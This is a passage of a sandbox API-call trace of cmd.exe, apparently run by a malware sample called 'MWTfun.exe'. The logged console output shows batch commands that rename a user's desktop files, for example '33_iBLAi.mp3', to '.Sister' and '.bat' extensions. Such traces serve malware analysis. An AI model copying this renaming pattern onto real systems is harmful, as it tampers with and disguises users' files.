??_V@YAXPEAX@Z () returned 0x21ed8f10840 [0137.554] GetProcessHeap () returned 0x21ed8c70000 [0137.554] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7ce20 [0137.554] GetProcessHeap () returned 0x21ed8c70000 [0137.554] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cdcc80 [0137.554] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0137.554] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0137.554] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0137.555] GetLastError () returned 0x2 [0137.555] GetProcessHeap () returned 0x21ed8c70000 [0137.555] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d20070 [0137.557] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8d20080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0137.557] SetErrorMode (uMode=0x0) returned 0x0 [0137.557] SetErrorMode (uMode=0x1) returned 0x0 [0137.557] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed8f10840, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0137.558] SetErrorMode (uMode=0x0) returned 0x1 [0137.558] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0137.558] GetProcessHeap () returned 0x21ed8c70000 [0137.558] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cdcef0 [0137.558] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0137.558] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0137.558] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0137.558] GetLastError () returned 0x2 [0137.559] ??_V@YAXPEAX@Z () returned 0x1 [0137.559] malloc (_Size=0xffce) returned 0x21ed8f10840 [0137.559] ??_V@YAXPEAX@Z () returned 0x21ed8f10840 [0137.559] malloc (_Size=0xffce) returned 0x21ed8f20820 [0137.559] ??_V@YAXPEAX@Z () returned 0x21ed8f20820 [0137.560] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0137.560] GetLastError () returned 0x2 [0137.560] _get_osfhandle (_FileHandle=2) returned 0x54 [0137.560] GetFileType (hFile=0x54) returned 0x2 [0137.560] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0137.560] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0137.591] _get_osfhandle (_FileHandle=2) returned 0x54 [0137.591] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0137.743] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0137.744] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0137.744] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0137.982] longjmp () [0137.982] ??_V@YAXPEAX@Z () returned 0x1 [0137.983] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b737120, ftCreationTime.dwHighDateTime=0x1d5f009, ftLastAccessTime.dwLowDateTime=0x2037c380, ftLastAccessTime.dwHighDateTime=0x1d5ed36, ftLastWriteTime.dwLowDateTime=0x2037c380, ftLastWriteTime.dwHighDateTime=0x1d5ed36, nFileSizeHigh=0x0, nFileSizeLow=0xf6b1, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="33_iBLAi.mp3", cAlternateFileName="")) returned 1 [0137.983] GetProcessHeap () returned 0x21ed8c70000 [0137.983] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdc080, Size=0xd8) returned 0x21ed8cdd160 [0137.983] GetProcessHeap () returned 0x21ed8c70000 [0137.983] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdd160) returned 0xd8 [0137.983] GetProcessHeap () returned 0x21ed8c70000 [0137.984] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d30060 [0137.984] GetProcessHeap () returned 0x21ed8c70000 [0137.984] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d30060, Size=0x30) returned 0x21ed8d30060 [0137.984] GetProcessHeap () returned 0x21ed8c70000 [0137.984] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d30060) returned 0x30 [0137.984] GetProcessHeap () returned 0x21ed8c70000 [0137.984] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d300a0 [0137.984] malloc (_Size=0x1ff9c) returned 0x21ed9080080 [0137.987] GetProcessHeap () returned 0x21ed8c70000 [0137.987] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2a) returned 0x21ed8cc88d0 [0137.987] ??_V@YAXPEAX@Z () returned 0x1 [0137.988] GetProcessHeap () returned 0x21ed8c70000 [0137.988] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d300a0, Size=0x140) returned 0x21ed8d300a0 [0137.988] GetProcessHeap () returned 0x21ed8c70000 [0137.989] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d300a0) returned 0x140 [0137.989] GetProcessHeap () returned 0x21ed8c70000 [0137.989] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d301f0 [0137.989] GetProcessHeap () returned 0x21ed8c70000 [0137.989] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d301f0, Size=0x290) returned 0x21ed8d301f0 [0137.989] GetProcessHeap () returned 0x21ed8c70000 [0137.989] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d301f0) returned 0x290 [0137.989] GetProcessHeap () returned 0x21ed8c70000 [0137.989] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d30490 [0137.989] GetProcessHeap () returned 0x21ed8c70000 [0137.989] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d30490, Size=0x30) returned 0x21ed8d30490 [0137.989] GetProcessHeap () returned 0x21ed8c70000 [0137.989] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d30490) returned 0x30 [0137.989] GetProcessHeap () returned 0x21ed8c70000 [0137.989] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d304d0 [0137.989] malloc (_Size=0x1ff9c) returned 0x21ed9080080 [0137.992] GetProcessHeap () returned 0x21ed8c70000 [0137.992] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2a) returned 0x21ed8cc87d0 [0137.992] ??_V@YAXPEAX@Z () returned 0x1 [0137.993] malloc (_Size=0x1ff9c) returned 0x21ed9080080 [0137.996] GetFullPathNameW (in: lpFileName="33_iBLAi.mp3", nBufferLength=0xffce, lpBuffer=0x21ed9080080, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\33_iBLAi.mp3", lpFilePart=0xa6cf4fe1c8*="33_iBLAi.mp3") returned 0x24 [0137.996] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cc40 [0137.996] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0137.997] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0137.997] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0137.997] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7b599812, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7b599812, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cc40 [0137.997] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0137.997] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\33_iBLAi.mp3", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b737120, ftCreationTime.dwHighDateTime=0x1d5f009, ftLastAccessTime.dwLowDateTime=0x2037c380, ftLastAccessTime.dwHighDateTime=0x1d5ed36, ftLastWriteTime.dwLowDateTime=0x2037c380, ftLastWriteTime.dwHighDateTime=0x1d5ed36, nFileSizeHigh=0x0, nFileSizeLow=0xf6b1, dwReserved0=0x4, dwReserved1=0x80, cFileName="33_iBLAi.mp3", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0137.997] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0137.997] malloc (_Size=0x1ff9c) returned 0x21ed90a0030 [0137.998] ??_V@YAXPEAX@Z () returned 0x21ed90a0030 [0137.999] GetProcessHeap () returned 0x21ed8c70000 [0137.999] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8c95eb0 [0137.999] ??_V@YAXPEAX@Z () returned 0x1 [0137.999] ??_V@YAXPEAX@Z () returned 0x1 [0138.001] GetProcessHeap () returned 0x21ed8c70000 [0138.001] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d304d0, Size=0x140) returned 0x21ed8d304d0 [0138.001] GetProcessHeap () returned 0x21ed8c70000 [0138.001] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d304d0) returned 0x140 [0138.001] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0138.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.001] GetFileType (hFile=0x50) returned 0x2 [0138.001] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.001] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0138.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.024] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0138.037] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0138.037] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0138.038] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0138.038] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.038] GetFileType (hFile=0x50) returned 0x2 [0138.038] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.038] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0138.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.048] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0138.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.060] GetFileType (hFile=0x50) returned 0x2 [0138.060] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.060] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0138.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.065] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d30070*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d30070*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0138.071] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"33_iBLAi.mp3\" \"33_iBLAi.mp3.Sister\" ") returned 38 [0138.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.071] GetFileType (hFile=0x50) returned 0x2 [0138.071] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.071] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0138.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.073] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x26) returned 1 [0138.075] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0138.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.075] GetFileType (hFile=0x50) returned 0x2 [0138.075] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.075] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0138.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.104] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0138.108] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0138.108] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.108] GetFileType (hFile=0x50) returned 0x2 [0138.108] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.108] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0138.114] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.114] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0138.125] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0138.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.125] GetFileType (hFile=0x50) returned 0x2 [0138.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.125] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0138.127] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.127] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0138.130] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0138.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.130] GetFileType (hFile=0x50) returned 0x2 [0138.131] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.131] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0138.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.165] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0138.178] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.178] GetFileType (hFile=0x50) returned 0x2 [0138.180] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.180] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0138.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.215] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d304a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d304a0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0138.258] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"33_iBLAi.mp3.Sister\" \"33_iBLAi.bat\" ") returned 38 [0138.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.258] GetFileType (hFile=0x50) returned 0x2 [0138.258] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.258] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0138.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.260] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x26) returned 1 [0138.267] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0138.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.267] GetFileType (hFile=0x50) returned 0x2 [0138.267] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0138.267] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0138.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0138.303] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0138.326] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0138.329] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0138.329] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0138.330] malloc (_Size=0xffce) returned 0x21ed9080080 [0138.331] ??_V@YAXPEAX@Z () returned 0x21ed9080080 [0138.332] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0138.332] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0138.332] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0138.332] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0138.332] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0138.332] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0138.332] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0138.332] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0138.332] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0138.332] ??_V@YAXPEAX@Z () returned 0x1 [0138.332] GetProcessHeap () returned 0x21ed8c70000 [0138.332] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa8) returned 0x21ed8cdc080 [0138.332] GetProcessHeap () returned 0x21ed8c70000 [0138.332] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdc080, Size=0x5c) returned 0x21ed8cdc080 [0138.332] GetProcessHeap () returned 0x21ed8c70000 [0138.332] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdc080) returned 0x5c [0138.332] GetProcessHeap () returned 0x21ed8c70000 [0138.332] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x64) returned 0x21ed8c7c830 [0138.332] GetProcessHeap () returned 0x21ed8c70000 [0138.333] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa8) returned 0x21ed8cdd240 [0138.333] GetProcessHeap () returned 0x21ed8c70000 [0138.333] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdd240, Size=0x5c) returned 0x21ed8cdd240 [0138.333] GetProcessHeap () returned 0x21ed8c70000 [0138.333] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdd240) returned 0x5c [0138.333] malloc (_Size=0xffce) returned 0x21ed9080080 [0138.333] ??_V@YAXPEAX@Z () returned 0x21ed9080080 [0138.333] GetProcessHeap () returned 0x21ed8c70000 [0138.333] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cdc0 [0138.333] GetProcessHeap () returned 0x21ed8c70000 [0138.333] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d312a0 [0138.333] _wcsicmp (_String1="33_iBLAi.mp3", _String2=".") returned 5 [0138.333] _wcsicmp (_String1="33_iBLAi.mp3", _String2="..") returned 5 [0138.333] GetFileAttributesW (lpFileName="33_iBLAi.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\33_iblai.mp3")) returned 0x20 [0138.333] GetProcessHeap () returned 0x21ed8c70000 [0138.333] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d32630 [0138.335] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8d32640 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0138.335] SetErrorMode (uMode=0x0) returned 0x0 [0138.335] SetErrorMode (uMode=0x1) returned 0x0 [0138.335] GetFullPathNameW (in: lpFileName="33_iBLAi.mp3", nBufferLength=0x7fe7, lpBuffer=0x21ed9080080, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\33_iBLAi.mp3", lpFilePart=0xa6cf4fd660*="33_iBLAi.mp3") returned 0x24 [0138.335] SetErrorMode (uMode=0x0) returned 0x1 [0138.336] GetProcessHeap () returned 0x21ed8c70000 [0138.336] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d32140 [0138.336] _wcsicmp (_String1="33_iBLAi.mp3", _String2=".") returned 5 [0138.336] _wcsicmp (_String1="33_iBLAi.mp3", _String2="..") returned 5 [0138.336] GetFileAttributesW (lpFileName="33_iBLAi.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\33_iblai.mp3")) returned 0x20 [0138.338] ??_V@YAXPEAX@Z () returned 0x1 [0138.338] malloc (_Size=0xffce) returned 0x21ed9080080 [0138.338] ??_V@YAXPEAX@Z () returned 0x21ed9080080 [0138.338] malloc (_Size=0xffce) returned 0x21ed9090060 [0138.338] ??_V@YAXPEAX@Z () returned 0x21ed9090060 [0138.338] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\33_iBLAi.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\33_iblai.mp3")) returned 0x20 [0138.339] malloc (_Size=0xffce) returned 0x21ed90a0040 [0138.339] ??_V@YAXPEAX@Z () returned 0x21ed90a0040 [0138.340] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\33_iBLAi.mp3", fInfoLevelId=0x1, lpFindFileData=0x21ed8d312b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d312b0) returned 0x21ed8c7cee0 [0138.340] malloc (_Size=0xffce) returned 0x21ed90b0020 [0138.340] 